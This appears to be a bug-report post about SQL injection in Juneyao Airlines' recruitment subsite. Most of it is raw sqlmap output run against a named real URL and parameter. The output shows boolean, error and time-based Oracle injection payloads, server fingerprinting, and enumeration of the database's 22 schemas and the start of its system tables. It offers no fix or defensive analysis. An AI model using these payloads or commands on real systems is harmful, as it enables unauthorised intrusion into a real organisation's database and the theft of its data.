Juneyao Airlines subsite SQL injection. Injection point: http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=2
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)||CHR(113)||(SELECT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
---
[10:04:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:04:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names
[10:04:50] [INFO] fetching database (schema) names
[10:04:50] [INFO] the SQL query used returns 22 entries
available databases [22]:
[*] APEX_030200
[*] APPQOSSYS
[*] COMPLAIN
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] FMS
[*] IOFFICE
[*] KQ
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[10:04:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (h
[10:04:50] [INFO] fetched data logged to text files under 'D:\360?~1\SQLMAP~1.4\Bin\output\zhaopin.
[*] shutting down at 10:04:50
[root@Hacker~]# Sqlmap Sqlmap sqlmap -u http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal
[*] starting at 10:09:58
[10:09:58] [INFO] resuming back-end DBMS 'oracle'
[10:09:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)|
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_US
---
[10:09:58] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:09:58] [INFO] fetching tables for database: 'SYSTEM'
sqlmap got a 302 redirect to 'http://zhaopin.juneyaoair.com:8081/Error.aspx'. Do you want to follow
[10:10:01] [INFO] the SQL query used returns 161 entries